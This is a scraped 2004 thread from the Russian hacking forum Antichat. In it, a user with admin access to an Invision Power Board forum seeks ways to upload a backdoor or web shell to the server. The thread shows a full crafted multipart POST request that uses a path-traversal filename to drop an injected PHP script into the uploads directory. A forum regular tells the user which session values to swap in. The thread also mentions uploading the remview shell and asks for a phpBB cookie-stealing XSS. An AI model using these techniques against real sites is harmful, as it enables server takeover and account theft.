Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Как можно залить бэкдор на сервер,если есть доступ в админку форума на Invision Power |
30.06.2004, 10:29
|
|
Новичок
Регистрация: 21.06.2004
Сообщений: 11
Провел на форуме:
41885
Репутация:
0
|
|
Как можно залить бэкдор на сервер,если есть доступ в админку форума на Invision Power
Как можно залить бэкдор на сервер,если есть доступ в админку форума на Invision Power Board ???
На сайте www.antichat.ru/txt/IPB/index2.php - Algol рассказывает как можно это сделать через меню Manage emoticons. Внизу мы видим форму для отправки смайликов на сервер. Защиты на тип файлов для смайликов, в IPB не предусмотрено, поэтому без труда можно залить файл произвольного типа. Однако иногда это не выходит  !!! И вот я хочу спросить не знает ли еще кто-нибудь о другом способе заливки бэкдора !!!
P.S заранее спасибо !!! |
|
|
01.07.2004, 13:43
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Что значит "не выходит"??
Опиши нормально проблему.
|
|
|
|
01.07.2004, 17:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Проблема в том,что чтобы я не пытался загрузить через upload- всё пишет неудачная загрузка !!!
|
|
|
|
08.07.2004, 17:15
|
|
Новичок
Регистрация: 21.06.2004
Сообщений: 11
Провел на форуме:
41885
Репутация:
0
|
|
Кстати Algol не подскажешь еще пример межсайтового скриптинга для похищения кукисов с phpbb 2.0.8
|
|
|
|
08.07.2004, 22:53
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июля 01 2004,17:25)</td></tr><tr><td id="QUOTE">Проблема в том,что чтобы я не пытался загрузить через upload- всё пишет неудачная загрузка !!![/QUOTE]<span id='postcolor'>
Кто пишет?
В какой ситуации пишет ??
Смайлики загружаются хоть куда нибудь?
Автаоры в upload загружаются ?
(И кстати в статье фокус со смйлами описан для примера, а вообще-то можно попробовать и через что-то другое заливать)
PS
Насчет phpBB - пока за него не брались, поэтому ничего сказать не могу.. Если найдешь что нить - черкани ...
|
|
|
|
09.07.2004, 17:05
|
|
Новичок
Регистрация: 21.06.2004
Сообщений: 11
Провел на форуме:
41885
Репутация:
0
|
|
Объясняю подробно и понятно !!! Захожу я в админку выбираю меню загрузки смайликов,пытаюсь загрузить remview и другие шеллы,нажимаю кнопку загрузить и через несколько секунд появляется страница с надписью неудачная загрузка !!! Причём не загружаются даже смайлики,которые в принципе должны закружаться  |
|
|
|
10.07.2004, 00:14
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Ну правильно. В директорию смайлов запись закрыта. Но в upload то должно загружаться
|
|
|
|
10.07.2004, 13:40
|
|
Новичок
Регистрация: 21.06.2004
Сообщений: 11
Провел на форуме:
41885
Репутация:
0
|
|
По пробовал залить в upload,для этого воспользовался твоей статьей захват сайтов и примером модифицированного запроса:
POST http://someSiteForum/admin.php?adses...1f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.p....ode=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"
7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"
emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"
op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream
<% echo("Hello from injected PHP script"  %>
-----------------------------7d43942c405bc--
Ну естественно название сайта и хэш сменил, но после отправки если нажать кнопку show body in browser то открывается окно и просят ввести пароль для входа в админку !!! Я не знаю почему так получается ведь хэш то правильный у меня указан !!! И еще вот эта строчка
<% echo("Hello from injected PHP script" %>
-----------------------------7d43942c405bc--
зачем нужна можешь пояснить ??? |
|
|
|
10.07.2004, 23:22
|
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916
Репутация:
0
|
|
Помимо адреса и хеша, нужно еще заменить номер сессии adsess=7456d367b18da87d161f59424a4e96f7
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Цитата </td></tr><tr><td id="QUOTE"><% echo("Hello from injected PHP script" %>
-----------------------------7d43942c405bc--
зачем нужна можешь пояснить ???[/QUOTE]<span id='postcolor'>
Вообще-то это внедряемый пхп-скрипт  |
|
|
|
11.07.2004, 13:34
|
|
Новичок
Регистрация: 21.06.2004
Сообщений: 11
Провел на форуме:
41885
Репутация:
0
|
|
Всё изменил как надо,только теперь в твоей проге сразу открывается окно с надписью неудачная загрузка !!!
И даже не предлагают ничего загрузить  вот в этом теперь и проблема !!! |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
